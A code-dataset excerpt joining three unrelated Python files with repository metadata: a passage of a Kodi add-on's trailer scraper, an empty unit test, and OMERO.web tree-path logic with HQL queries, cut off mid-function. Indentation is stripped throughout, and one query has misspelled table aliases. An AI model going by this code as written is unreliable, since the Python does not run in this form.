thumbnail = "https://img.youtube.com/vi/%s/0.jpg" % code
itemlist.append(item.clone(title="Trailer [youtube]", url=trailer_url, server="youtube",
thumbnail=thumbnail, action="play", text_color="white"))
else:
for scrapedurl, language, scrapedtitle in matches:
if language == "1":
idioma = " (ESP)"
else:
idioma = " (V.O)"
scrapedurl = urlparse.urljoin("http://www.abandomoviez.net/%s" % item.prefix, scrapedurl)
scrapedtitle = scrapertools.htmlclean(scrapedtitle) + idioma + " [youtube]"
if item.contextual:
i += 1
message += ".."
progreso.update(10 + (90*i/len(matches)), message)
scrapedtitle = "[COLOR white]%s[/COLOR]" % scrapedtitle
data_trailer = scrapertools.downloadpage(scrapedurl)
trailer_url = scrapertools.find_single_match(data_trailer, 'iframe.*?src="([^"]+)"')
trailer_url = trailer_url.replace("embed/", "watch?v=")
code = scrapertools.find_single_match(trailer_url, 'v=([A-z0-9\-_]+)')
thumbnail = "https://img.youtube.com/vi/%s/0.jpg" % code
itemlist.append(item.clone(title=scrapedtitle, url=trailer_url, server="youtube", action="play",
thumbnail=thumbnail, text_color="white"))
if item.contextual:
progreso.close()
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Abandomoviez",
action="manual_search", thumbnail="", text_color="green", extra="abandomoviez"))
return itemlist
def filmaffinity_search(item):
logger.info()
if item.filmaffinity:
item.url = item.filmaffinity
return search_links_filmaff(item)
# Comprueba si es una búsqueda de cero o viene de la opción Siguiente
if item.page != "":
data = scrapertools.downloadpage(item.page)
else:
params = urllib.urlencode([('stext', item.contentTitle), ('stype%5B%5D', 'title'), ('country', ''),
('genre', ''), ('fromyear', item.year), ('toyear', item.year)])
url = "http://www.filmaffinity.com/es/advsearch.php?%s" % params
data = scrapertools.downloadpage(url)
itemlist = []
patron = '<div class="mc-poster">.*?<img.*?src="([^"]+)".*?' \
'<div class="mc-title"><a href="/es/film(\d+).html"[^>]+>(.*?)<img'
matches = scrapertools.find_multiple_matches(data, patron)
# Si solo hay un resultado, busca directamente los trailers, sino lista todos los resultados
if len(matches) == 1:
item.url = "http://www.filmaffinity.com/es/evideos.php?movie_id=%s" % matches[0][1]
item.thumbnail = matches[0][0]
if not item.thumbnail.startswith("http"):
item.thumbnail = "http://www.filmaffinity.com" + item.thumbnail
itemlist = search_links_filmaff(item)
elif len(matches) > 1:
for scrapedthumbnail, id, scrapedtitle in matches:
if not scrapedthumbnail.startswith("http"):
scrapedthumbnail = "http://www.filmaffinity.com" + scrapedthumbnail
scrapedurl = "http://www.filmaffinity.com/es/evideos.php?movie_id=%s" % id
scrapedtitle = unicode(scrapedtitle, encoding="utf-8", errors="ignore")
scrapedtitle = scrapertools.htmlclean(scrapedtitle)
itemlist.append(item.clone(title=scrapedtitle, url=scrapedurl, text_color="white",
action="search_links_filmaff", thumbnail=scrapedthumbnail))
next_page = scrapertools.find_single_match(data, '<a href="([^"]+)">>></a>')
if next_page != "":
next_page = urlparse.urljoin("http://www.filmaffinity.com/es/", next_page)
itemlist.append(item.clone(title=">> Siguiente", page=next_page, action="filmaffinity_search", thumbnail="",
text_color=""))
if not itemlist:
itemlist.append(item.clone(title="La búsqueda no ha dado resultados (%s)" % item.contentTitle,
action="", thumbnail="", text_color=""))
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Filmaffinity",
action="manual_search", text_color="green", thumbnail="", extra="filmaffinity"))
return itemlist
def search_links_filmaff(item):
logger.info()
itemlist = []
data = scrapertools.downloadpage(item.url)
if not '<a class="lnkvvid"' in data:
itemlist.append(item.clone(title="No hay ningún vídeo disponible", action="", text_color=""))
else:
patron = '<a class="lnkvvid".*?<b>(.*?)</b>.*?iframe.*?src="([^"]+)"'
matches = scrapertools.find_multiple_matches(data, patron)
for scrapedtitle, scrapedurl in matches:
if not scrapedurl.startswith("http:"):
scrapedurl = urlparse.urljoin("http:", scrapedurl)
trailer_url = scrapedurl.replace("-nocookie.com/embed/", ".com/watch?v=")
if "youtube" in trailer_url:
server = "youtube"
code = scrapertools.find_single_match(trailer_url, 'v=([A-z0-9\-_]+)')
thumbnail = "https://img.youtube.com/vi/%s/0.jpg" % code
else:
server = ""
thumbnail = item.thumbnail
scrapedtitle = unicode(scrapedtitle, encoding="utf-8", errors="ignore")
scrapedtitle = scrapertools.htmlclean(scrapedtitle)
scrapedtitle += " [" + server + "]"
if item.contextual:
scrapedtitle = "[COLOR white]%s[/COLOR]" % scrapedtitle
itemlist.append(item.clone(title=scrapedtitle, url=trailer_url, server=server, action="play",
thumbnail=thumbnail, text_color="white"))
itemlist = servertools.get_servers_itemlist(itemlist)
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Filmaffinity",
action="manual_search", thumbnail="", text_color="green", extra="filmaffinity"))
return itemlist
def jayhap_search(item):
logger.info()
itemlist = []
if item.extra != "jayhap":
item.contentTitle += " trailer"
texto = item.contentTitle
post = urllib.urlencode({'q': texto, 'yt': 'true', 'vm': 'true', 'dm': 'true',
'v': 'all', 'l': 'all', 'd': 'all'})
# Comprueba si es una búsqueda de cero o viene de la opción Siguiente
if item.page != "":
post += urllib.urlencode(item.page)
data = scrapertools.downloadpage("https://www.jayhap.com/load_more.php", post=post)
else:
data = scrapertools.downloadpage("https://www.jayhap.com/get_results.php", post=post)
data = jsontools.load_json(data)
for video in data['videos']:
url = video['url']
server = video['source'].lower()
duration = " (" + video['duration'] + ")"
title = video['title'].decode("utf-8") + duration + " [" + server.capitalize() + "]"
thumbnail = video['thumbnail']
if item.contextual:
title = "[COLOR white]%s[/COLOR]" % title
itemlist.append(item.clone(action="play", server=server, title=title, url=url, thumbnail=thumbnail,
text_color="white"))
if not itemlist:
itemlist.append(item.clone(title="La búsqueda no ha dado resultados (%s)" % item.contentTitle,
action="", thumbnail="", text_color=""))
else:
tokens = data['tokens']
tokens['yt_token'] = tokens.pop('youtube')
tokens['vm_token'] = tokens.pop('vimeo')
tokens['dm_token'] = tokens.pop('dailymotion')
itemlist.append(item.clone(title=">> Siguiente", page=tokens, action="jayhap_search", extra="jayhap",
thumbnail="", text_color=""))
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Jayhap", action="manual_search",
text_color="green", thumbnail="", extra="jayhap"))
return itemlist
try:
import xbmcgui
import xbmc
class Select(xbmcgui.WindowXMLDialog):
def __init__(self, *args, **kwargs):
self.item = kwargs.get('item')
self.itemlist = kwargs.get('itemlist')
self.caption = kwargs.get('caption')
self.result = None
def onInit(self):
try:
self.control_list = self.getControl(6)
self.getControl(5).setNavigation(self.control_list, self.control_list, self.control_list, self.control_list)
self.getControl(3).setEnabled(0)
self.getControl(3).setVisible(0)
except:
pass
try:
self.getControl(99).setVisible(False)
except:
pass
self.getControl(1).setLabel("[COLOR orange]"+self.caption+"[/COLOR]")
self.getControl(5).setLabel("[COLOR tomato][B]Cerrar[/B][/COLOR]")
self.items = []
for item in self.itemlist:
item_l = xbmcgui.ListItem(item.title)
item_l.setArt({'thumb': item.thumbnail})
item_l.setProperty('item_copy', item.tourl())
self.items.append(item_l)
self.control_list.reset()
self.control_list.addItems(self.items)
self.setFocus(self.control_list)
def onClick(self, id):
# Boton Cancelar y [X]
if id == 5:
global window_select, result
self.result = "_no_video"
result = "no_video"
self.close()
window_select.pop()
if not window_select:
if not self.item.windowed:
del window_select
else:
window_select[-1].doModal()
def onAction(self,action):
global window_select, result
if action == 92 or action == 110:
self.result = "no_video"
result = "no_video"
self.close()
window_select.pop()
if not window_select:
if not self.item.windowed:
del window_select
else:
window_select[-1].doModal()
try:
if (action == 7 or action == 100) and self.getFocusId() == 6:
selectitem = self.control_list.getSelectedItem()
item = Item().fromurl(selectitem.getProperty("item_copy"))
if item.action == "play" and self.item.windowed:
video_urls, puede, motivo = servertools.resolve_video_urls_for_playing(item.server, item.url)
self.close()
xbmc.sleep(200)
if puede:
result = video_urls[-1][1]
self.result = video_urls[-1][1]
else:
result = None
self.result = None
elif item.action == "play" and not self.item.windowed:
for window in window_select:
window.close()
retorna = platformtools.play_video(item)
if not retorna:
while True:
xbmc.sleep(1000)
if not xbmc.Player().isPlaying():
break
window_select[-1].doModal()
else:
self.close()
buscartrailer(item)
except:
import traceback
logger.error(traceback.format_exc())
except:
pass
|
neno1978/pelisalacarta
|
python/main-classic/channels/trailertools.py
|
Python
|
gpl-3.0
| 26,400 | 0.005538 |
# coding: utf-8
import unittest
import jokekappa
class VoidTest(unittest.TestCase):
def test_void(self):
pass
|
CodeTengu/jokekappa
|
tests/test_core.py
|
Python
|
mit
| 127 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Generic functionality for handling particular links and "showing" objects
in the OMERO.web tree view.
"""
import omero
import re
from omero.rtypes import rint, rlong
from django.core.urlresolvers import reverse
from copy import deepcopy
from django.conf import settings
class IncorrectMenuError(Exception):
"""Exception to signal that we are on the wrong menu."""
def __init__(self, uri):
"""
Constructs a new Exception instance.
@param uri URI to redirect to.
@type uri String
"""
super(Exception, self).__init__()
self.uri = uri
class Show(object):
"""
This object is used by most of the top-level pages. The "show" and
"path" query strings are used by this object to both direct OMERO.web to
the correct locations in the hierarchy and select the correct objects
in that hierarchy.
"""
# List of prefixes that are at the top level of the tree
TOP_LEVEL_PREFIXES = ('project', 'screen', 'tagset')
# List of supported object types
SUPPORTED_OBJECT_TYPES = (
'project', 'dataset', 'image', 'screen', 'plate', 'tag',
'acquisition', 'run', 'well', 'tagset'
)
# Regular expression which declares the format for a "path" used either
# in the "path" or "show" query string. No modifications should be made
# to this regex without corresponding unit tests in
# "tests/unit/test_show.py".
PATH_REGEX = re.compile(
r'(?P<object_type>\w+)\.?(?P<key>\w+)?[-=](?P<value>[^\|]*)\|?'
)
# Regular expression for matching Well names
WELL_REGEX = re.compile(
'^(?:(?P<alpha_row>[a-zA-Z]+)(?P<digit_column>\d+))|'
'(?:(?P<digit_row>\d+)(?P<alpha_column>[a-zA-Z]+))$'
)
def __init__(self, conn, request, menu):
"""
Constructs a Show instance. The instance will not be fully
initialised until the first retrieval of the L{Show.first_selected}
property.
@param conn OMERO gateway.
@type conn L{omero.gateway.BlitzGateway}
@param request Django HTTP request.
@type request L{django.http.HttpRequest}
@param menu Literal representing the current menu we are on.
@type menu String
"""
# The list of "paths" ("type-id") we have been requested to
# show/select in the user interface. May be modified if one or
# more of the elements is not in the tree. This is currently the
# case for all Screen-Plate-Well hierarchy elements below Plate
# (Well for example).
self._initially_select = list()
# The nodes of the tree that will be initially open based on the
# nodes that are initially selected.
self._initially_open = list()
# The owner of the node closest to the root of the tree from the
# list of initially open nodes.
self._initially_open_owner = None
# First selected node from the requested initially open "paths"
# that is first loaded on first retrieval of the "first_selected"
# property.
self._first_selected = None
self.conn = conn
self.request = request
self.menu = menu
path = self.request.GET.get('path', '').split('|')[-1]
self._add_if_supported(path)
show = self.request.GET.get('show', '')
for path in show.split('|'):
self._add_if_supported(path)
def _add_if_supported(self, path):
"""Adds a path to the initially selected list if it is supported."""
m = self.PATH_REGEX.match(path)
if m is None:
return
object_type = m.group('object_type')
key = m.group('key')
value = m.group('value')
if key is None:
key = 'id'
if object_type in self.SUPPORTED_OBJECT_TYPES:
# 'run' is an alternative for 'acquisition'
object_type = object_type.replace('run', 'acquisition')
self._initially_select.append(
'%s.%s-%s' % (object_type, key, value)
)
def _load_tag(self, attributes):
"""
Loads a Tag based on a certain set of attributes from the server.
@param attributes Set of attributes to filter on.
@type attributes L{dict}
"""
# Tags have an "Annotation" suffix added to the object name so
# need to be loaded differently.
return next(self.conn.getObjects(
"TagAnnotation", attributes=attributes
))
def get_well_row_column(self, well):
"""
Retrieves a tuple of row and column as L{int} for a given Well name
("A1" or "1A") string.
@param well Well name string to retrieve the row and column tuple for.
@type well L{str}
"""
m = self.WELL_REGEX.match(well)
if m is None:
return None
# We are using an algorithm that expects alpha columns and digit
# rows (like a spreadsheet). is_reversed will be True if those
# conditions are not met, signifying that the row and column
# calculated needs to be reversed before returning.
is_reversed = False
if m.group('alpha_row') is not None:
a = m.group('alpha_row').upper()
b = m.group('digit_column')
is_reversed = True
else:
a = m.group('alpha_column').upper()
b = m.group('digit_row')
# Convert base26 column string to number. Adapted from XlsxWriter:
# * https://github.com/jmcnamara/XlsxWriter
# * xlsxwriter/utility.py
n = 0
column = 0
for character in reversed(a):
column += (ord(character) - ord('A') + 1) * (26 ** n)
n += 1
# Convert 1-index to zero-index
row = int(b) - 1
column -= 1
if is_reversed:
return column, row
return row, column
def _load_well(self, attributes):
"""
Loads a Well based on a certain set of attributes from the server.
@param attributes Set of attributes to filter on.
@type attributes L{dict}
"""
if 'id' in attributes:
return self.conn.getObject('Well', attributes=attributes)
if 'name' in attributes:
row, column = self.get_well_row_column(attributes['name'])
path = self.request.GET.get('path', '')
for m in self.PATH_REGEX.finditer(path):
object_type = m.group('object_type')
# May have 'run' here rather than 'acquisition' because
# the path will not have been validated and replaced.
if object_type not in ('plate', 'run', 'acquisition'):
continue
# 'run' is an alternative for 'acquisition'
object_type = object_type.replace('run', 'acquisition')
# Try and load the potential parent first
key = m.group('key')
value = m.group('value')
if key is None:
key = 'id'
if key == 'id':
value = long(value)
parent_attributes = {key: value}
parent, = self.conn.getObjects(
object_type, attributes=parent_attributes
)
# Now use the parent to try and locate the Well
query_service = self.conn.getQueryService()
params = omero.sys.ParametersI()
params.map['row'] = rint(row)
params.map['column'] = rint(column)
params.addId(parent.id)
if object_type == 'plate':
db_row, = query_service.projection(
'select w.id from Well as w '
'where w.row = :row and w.column = :column '
'and w.plate.id = :id', params, self.conn.SERVICE_OPTS
)
if object_type == 'acquisition':
db_row, = query_service.projection(
'select distinct w.id from Well as w '
'join w.wellSamples as ws '
'where w.row = :row and w.column = :column '
'and ws.plateAcquisition.id = :id',
params, self.conn.SERVICE_OPTS
)
well_id, = db_row
return self.conn.getObject(
'Well', well_id.val
)
def _load_first_selected(self, first_obj, attributes):
"""
Loads the first selected object from the server. Will raise
L{IncorrectMenuError} if the initialized menu was incorrect for
the loaded objects.
@param first_obj Type of the first selected object.
@type first_obj String
@param attributes Set of attributes to filter on.
@type attributes L{dict}
"""
first_selected = None
if first_obj in ["tag", "tagset"]:
first_selected = self._load_tag(attributes)
elif first_obj == "well":
first_selected = self._load_well(attributes)
else:
# All other objects can be loaded by type and attributes.
first_selected, = self.conn.getObjects(
first_obj, attributes=attributes
)
if first_obj == "well":
# Wells aren't in the tree, so we need to look up the parent
well_sample = first_selected.getWellSample()
parent_node = None
parent_type = None
# It's possible that the Well that we've been requested to show
# has no fields (WellSample instances). In that case the Plate
# will be used but we don't have much choice.
if well_sample is not None:
parent_node = well_sample.getPlateAcquisition()
parent_type = "acquisition"
if parent_node is None:
# No WellSample for this well, try and retrieve the
# PlateAcquisition from the parent Plate.
plate = first_selected.getParent()
try:
parent_node, = plate.listPlateAcquisitions()
parent_type = "acquisition"
except ValueError:
# No PlateAcquisition for this well, use Plate instead
parent_node = plate
parent_type = "plate"
# Tree hierarchy open to first selected "real" object available
# in the tree.
self._initially_open = [
"%s-%s" % (parent_type, parent_node.getId()),
"%s-%s" % (first_obj, first_selected.getId())
]
first_selected = parent_node
else:
# Tree hierarchy open to first selected object.
self._initially_open = [
'%s-%s' % (first_obj, first_selected.getId())
]
# support for multiple objects selected by ID,
# E.g. show=image-1|image-2
if 'id' in attributes.keys() and len(self._initially_select) > 1:
# 'image.id-1' -> 'image-1'
self._initially_select = [
i.replace(".id", "") for i in self._initially_select]
else:
# Only select a single object
self._initially_select = self._initially_open[:]
self._initially_open_owner = first_selected.details.owner.id.val
return first_selected
def _find_first_selected(self):
"""Finds the first selected object."""
if len(self._initially_select) == 0:
return None
# tree hierarchy open to first selected object
m = self.PATH_REGEX.match(self._initially_select[0])
if m is None:
return None
first_obj = m.group('object_type')
# if we're showing a tag, make sure we're on the tags page...
if first_obj in ["tag", "tagset"] and self.menu != "usertags":
# redirect to usertags/?show=tag-123
raise IncorrectMenuError(
reverse(viewname="load_template", args=['usertags']) +
"?show=" + self._initially_select[0].replace(".id", "")
)
first_selected = None
try:
key = m.group('key')
value = m.group('value')
if key == 'id':
value = long(value)
attributes = {key: value}
# Set context to 'cross-group'
self.conn.SERVICE_OPTS.setOmeroGroup('-1')
first_selected = self._load_first_selected(first_obj, attributes)
except:
pass
if first_obj not in self.TOP_LEVEL_PREFIXES:
# Need to see if first item has parents
if first_selected is not None:
for p in first_selected.getAncestry():
# If 'Well' is a parent, we have stared with Image.
# We want to start again at 'Well' to _load_first_selected
# with well, so we get 'acquisition' in ancestors.
if p.OMERO_CLASS == "Well":
self._initially_select = ['well.id-%s' % p.getId()]
return self._find_first_selected()
if first_obj == "tag":
# Parents of tags must be tagset (no OMERO_CLASS)
self._initially_open.insert(0, "tagset-%s" % p.getId())
else:
self._initially_open.insert(
0, "%s-%s" % (p.OMERO_CLASS.lower(), p.getId())
)
self._initially_open_owner = p.details.owner.id.val
m = self.PATH_REGEX.match(self._initially_open[0])
if m.group('object_type') == 'image':
self._initially_open.insert(0, "orphaned-0")
return first_selected
@property
def first_selected(self):
"""
Retrieves the first selected object. The first time this method is
invoked on the instance the actual retrieval is performed. All other
invocations retrieve the same instance without server interaction.
Will raise L{IncorrectMenuError} if the initialized menu was
incorrect for the loaded objects.
"""
if self._first_selected is None:
self._first_selected = self._find_first_selected()
return self._first_selected
@property
def initially_select(self):
"""
Retrieves the list of "paths" ("type-id") we have been requested to
show/select in the user interface. May be different than we were
first initialised with due to certain nodes of the Screen-Plate-Well
hierachy not being present in the tree. Should not be invoked until
after first retrieval of the L{Show.first_selected} property.
"""
return self._initially_select
@property
def initially_open(self):
"""
Retrieves the nodes of the tree that will be initially open based on
the nodes that are initially selected. Should not be invoked until
after first retrieval of the L{Show.first_selected} property.
"""
return self._initially_open
@property
def initially_open_owner(self):
"""
Retrieves the owner of the node closest to the root of the tree from
the list of initially open nodes. Should not be invoked until
after first retrieval of the L{Show.first_selected} property.
"""
return self._initially_open_owner
def get_image_ids(conn, datasetId=None, groupId=-1, ownerId=None):
"""
Retrieves a list of all image IDs in a Dataset or Orphaned
(with owner specified by ownerId). The groupId can be specified
as needed, particuarly when querying orphaned images.
"""
qs = conn.getQueryService()
p = omero.sys.ParametersI()
so = deepcopy(conn.SERVICE_OPTS)
so.setOmeroGroup(groupId)
if datasetId is not None:
p.add('did', rlong(datasetId))
q = """select image.id from Image image
join image.datasetLinks dlink where dlink.parent.id = :did
order by lower(image.name), image.id"""
else:
p.add('ownerId', rlong(ownerId))
q = """select image.id from Image image where
image.details.owner.id = :ownerId and
not exists (
select dilink from DatasetImageLink as dilink
where dilink.child = image.id
) and
not exists (
select ws from WellSample ws
where ws.image.id = image.id
)
order by lower(image.name), image.id"""
iids = [i[0].val for i in qs.projection(q, p, so)]
return iids
def paths_to_object(conn, experimenter_id=None, project_id=None,
dataset_id=None, image_id=None, screen_id=None,
plate_id=None, acquisition_id=None, well_id=None,
group_id=None, page_size=None):
"""
Retrieves the parents of an object (E.g. P/D/I for image) as a list
of paths.
Lowest object in hierarchy is found by checking parameter ids in order:
image->dataset->project->well->acquisition->plate->screen->experimenter
If object has multiple paths, these can also be filtered by parent_ids.
E.g. paths to image_id filtered by dataset_id.
If image is in a Dataset or Orphaned collection that is paginated
(imageCount > page_size) then we include 'childPage', 'childCount'
and 'childIndex' in the dataset or orphaned dict.
The page_size default is settings.PAGE (omero.web.page_size)
Note on wells:
Selecting a 'well' is really for selecting well_sample paths
if a well is specified on its own, we return all the well_sample paths
than match
"""
qs = conn.getQueryService()
if page_size is None:
page_size = settings.PAGE
params = omero.sys.ParametersI()
service_opts = deepcopy(conn.SERVICE_OPTS)
lowest_type = None
if experimenter_id is not None:
params.add('eid', rlong(experimenter_id))
lowest_type = 'experimenter'
if screen_id is not None:
params.add('sid', rlong(screen_id))
lowest_type = 'screen'
if plate_id is not None:
params.add('plid', rlong(plate_id))
lowest_type = 'plate'
if acquisition_id is not None:
params.add('aid', rlong(acquisition_id))
lowest_type = 'acquisition'
if well_id is not None:
params.add('wid', rlong(well_id))
lowest_type = 'well'
if project_id is not None:
params.add('pid', rlong(project_id))
lowest_type = 'project'
if dataset_id is not None:
params.add('did', rlong(dataset_id))
lowest_type = 'dataset'
if image_id is not None:
params.add('iid', rlong(image_id))
lowest_type = 'image'
# If none of these parameters are set then there is nothing to find
if lowest_type is None:
return []
if group_id is not None:
service_opts.setOmeroGroup(group_id)
# Hierarchies for this object
paths = []
# It is probably possible to write a more generic query instead
# of special casing each type, but it will be less readable and
# maintainable than these
if lowest_type == 'image':
q = '''
select coalesce(powner.id, downer.id, iowner.id),
pdlink.parent.id,
dilink.parent.id,
(select count(id) from DatasetImageLink dil
where dil.parent=dilink.parent.id),
image.id,
image.details.group.id as groupId
from Image image
join image.details.owner iowner
left outer join image.datasetLinks dilink
left outer join dilink.parent.details.owner downer
left outer join dilink.parent.projectLinks pdlink
left outer join pdlink.parent.details.owner powner
where image.id = :iid
'''
where_clause = []
if dataset_id is not None:
where_clause.append('dilink.parent.id = :did')
if project_id is not None:
where_clause.append('pdlink.parent.id = :pid')
if experimenter_id is not None:
where_clause.append(
'coalesce(powner.id, downer.id, iowner.id) = :eid')
if len(where_clause) > 0:
q += ' and ' + ' and '.join(where_clause)
q += '''
order by coalesce(powner.id, downer.id, iowner.id),
pdlink.parent.id,
dilink.parent.id,
image.id
'''
for e in qs.projection(q, params, service_opts):
path = []
imageId = e[4].val
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
# If it is experimenter->project->dataset->image
if e[1] is not None:
path.append({
'type': 'project',
'id': e[1].val
})
# If it is experimenter->dataset->image or
# experimenter->project->dataset->image
if e[2] is not None:
imgCount = e[3].val
datasetId = e[2].val
ds = {
'type': 'dataset',
'id': datasetId,
'childCount': imgCount,
}
if imgCount > page_size:
# Need to know which page image is on
iids = get_image_ids(conn, datasetId)
index = iids.index(imageId)
page = (index / page_size) + 1 # 1-based index
ds['childIndex'] = index
ds['childPage'] = page
path.append(ds)
# If it is orphaned->image
paths_to_img = []
if e[2] is None:
# Check if image is in Well
paths_to_img = paths_to_well_image(
conn, params,
well_id=well_id, image_id=image_id,
acquisition_id=acquisition_id,
plate_id=plate_id,
screen_id=screen_id,
experimenter_id=experimenter_id,
orphanedImage=True)
if len(paths_to_img) == 0:
orph = {
'type': 'orphaned',
'id': e[0].val
}
iids = get_image_ids(conn, groupId=e[5].val,
ownerId=e[0].val)
if len(iids) > page_size:
try:
index = iids.index(imageId)
page = (index / page_size) + 1 # 1-based index
orph['childCount'] = len(iids)
orph['childIndex'] = index
orph['childPage'] = page
except ValueError:
# If image is in Well, it won't be in orphaned list
pass
path.append(orph)
if len(paths_to_img) > 0:
paths = paths_to_img
else:
# Image always present
path.append({
'type': 'image',
'id': imageId
})
paths.append(path)
elif lowest_type == 'dataset':
q = '''
select coalesce(powner.id, downer.id),
pdlink.parent.id,
dataset.id
from Dataset dataset
join dataset.details.owner downer
left outer join dataset.projectLinks pdlink
left outer join pdlink.parent.details.owner powner
where dataset.id = :did
'''
where_clause = []
if project_id is not None:
where_clause.append('pdlink.parent.id = :pid')
if experimenter_id is not None:
where_clause.append('coalesce(powner.id, downer.id) = :eid')
if len(where_clause) > 0:
q += ' and ' + ' and '.join(where_clause)
for e in qs.projection(q, params, service_opts):
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
# If it is experimenter->project->dataset
if e[1] is not None:
path.append({
'type': 'project',
'id': e[1].val
})
# Dataset always present
path.append({
'type': 'dataset',
'id': e[2].val
})
paths.append(path)
elif lowest_type == 'project':
q = '''
select project.details.owner.id,
project.id
from Project project
where project.id = :pid
'''
for e in qs.projection(q, params, service_opts):
path = []
# Always experimenter->project
path.append({
'type': 'experimenter',
'id': e[0].val
})
path.append({
'type': 'project',
'id': e[1].val
})
paths.append(path)
# This is basically the same as WellSample except that it is not
# restricted by a particular WellSample id
# May not have acquisition (load plate from well)
# We don't need to load the wellsample (not in tree)
elif lowest_type == 'well':
paths_to_img = paths_to_well_image(conn, params,
well_id=well_id,
image_id=image_id,
acquisition_id=acquisition_id,
plate_id=plate_id,
screen_id=screen_id,
experimenter_id=experimenter_id)
if len(paths_to_img) > 0:
paths.extend(paths_to_img)
elif lowest_type == 'acquisition':
q = '''
select coalesce(sowner.id, plowner.id, aowner.id),
slink.parent.id,
plate.id,
acquisition.id
from PlateAcquisition acquisition
join acquisition.details.owner aowner
left outer join acquisition.plate plate
left outer join plate.details.owner plowner
left outer join plate.screenLinks slink
left outer join slink.parent.details.owner sowner
where acquisition.id = :aid
'''
where_clause = []
if plate_id is not None:
where_clause.append('plate.id = :plid')
if screen_id is not None:
where_clause.append('slink.parent.id = :sid')
if experimenter_id is not None:
where_clause.append(
'coalesce(sowner.id, plowner.id, aowner.id) = :eid')
if len(where_clause) > 0:
q += ' and ' + ' and '.join(where_clause)
for e in qs.projection(q, params, service_opts):
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
# If it is experimenter->screen->plate->acquisition
if e[1] is not None:
path.append({
'type': 'screen',
'id': e[1].val
})
# If it is experimenter->plate->acquisition or
# experimenter->screen->plate->acquisition
if e[2] is not None:
path.append({
'type': 'plate',
'id': e[2].val
})
# Acquisition always present
path.append({
'type': 'acquisition',
'id': e[3].val
})
paths.append(path)
elif lowest_type == 'plate':
q = '''
select coalesce(sowner.id, plowner.id),
splink.parent.id,
plate.id
from Plate plate
join plate.details.owner sowner
left outer join plate.screenLinks splink
left outer join splink.parent.details.owner plowner
where plate.id = :plid
'''
where_clause = []
if screen_id is not None:
where_clause.append('splink.parent.id = :sid')
if experimenter_id is not None:
where_clause.append('coalesce(sowner.id, plowner.id) = :eid')
if len(where_clause) > 0:
q += ' and ' + ' and '.join(where_clause)
for e in qs.projection(q, params, service_opts):
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
# If it is experimenter->screen->plate
if e[1] is not None:
path.append({
'type': 'screen',
'id': e[1].val
})
# Plate always present
path.append({
'type': 'plate',
'id': e[2].val
})
paths.append(path)
elif lowest_type == 'screen':
q = '''
select screen.details.owner.id,
screen.id
from Screen screen
where screen.id = :sid
'''
for e in qs.projection(q, params, service_opts):
path = []
# Always experimenter->screen
path.append({
'type': 'experimenter',
'id': e[0].val
})
path.append({
'type': 'screen',
'id': e[1].val
})
paths.append(path)
elif lowest_type == 'experimenter':
path = []
# No query required here as this is the highest level container
path.append({
'type': 'experimenter',
'id': experimenter_id
})
paths.append(path)
return paths
def paths_to_well_image(conn, params, well_id=None, image_id=None,
acquisition_id=None,
plate_id=None, screen_id=None, experimenter_id=None,
orphanedImage=False):
qs = conn.getQueryService()
service_opts = deepcopy(conn.SERVICE_OPTS)
q = '''
select coalesce(sowner.id, plowner.id, aowner.id, wsowner.id),
slink.parent.id,
plate.id,
acquisition.id,
well.id
from WellSample wellsample
join wellsample.details.owner wsowner
left outer join wellsample.plateAcquisition acquisition
left outer join acquisition.details.owner aowner
join wellsample.well well
join well.plate plate
join plate.details.owner plowner
left outer join plate.screenLinks slink
left outer join slink.parent.details.owner sowner
'''
where_clause = []
if well_id is not None:
where_clause.append('wellsample.well.id = :wid')
if image_id is not None:
where_clause.append('wellsample.image.id = :iid')
if acquisition_id is not None:
where_clause.append('acquisition.id = :aid')
if plate_id is not None:
where_clause.append('plate.id = :plid')
if screen_id is not None:
where_clause.append('slink.parent.id = :sid')
if experimenter_id is not None:
where_clause.append(
'coalesce(sowner.id, plowner.id, aoener.id, wowner.id) = :eid')
if len(where_clause) > 0:
q += 'where ' + ' and '.join(where_clause)
paths = []
for e in qs.projection(q, params, service_opts):
path = []
# Experimenter is always found
path.append({
'type': 'experimenter',
'id': e[0].val
})
# If it is experimenter->screen->plate->acquisition->wellsample
if e[1] is not None:
path.append({
'type': 'screen',
'id': e[1].val
})
# Plate should always present
path.append({
'type': 'plate',
'id': e[2].val
})
# Acquisition not present if plate created via API (not imported)
if e[3] is not None:
path.append({
'type': 'acquisition',
'id': e[3].val
})
# Include Well if path is to image
if e[4] is not None and orphanedImage:
path.append({
'type': 'well',
'id': e[4].val
})
paths.append(path)
return paths
def paths_to_tag(conn, experimenter_id=None, tagset_id=None, tag_id=None):
"""
Finds tag for tag_id, also looks for parent tagset in path.
If tag_id and tagset_id are given, only return paths that have both.
If no tagset/tag paths are found, simply look for tags with tag_id.
"""
params = omero.sys.ParametersI()
service_opts = deepcopy(conn.SERVICE_OPTS)
where_clause = []
if experimenter_id is not None:
params.add('eid', rlong(experimenter_id))
where_clause.append(
'coalesce(tsowner.id, towner.id) = :eid')
if tag_id is not None:
params.add('tid', rlong(tag_id))
where_clause.append(
'ttlink.child.id = :tid')
if tagset_id is not None:
params.add('tsid', rlong(tagset_id))
where_clause.append(
'tagset.id = :tsid')
if tag_id is None and tagset_id is None:
return []
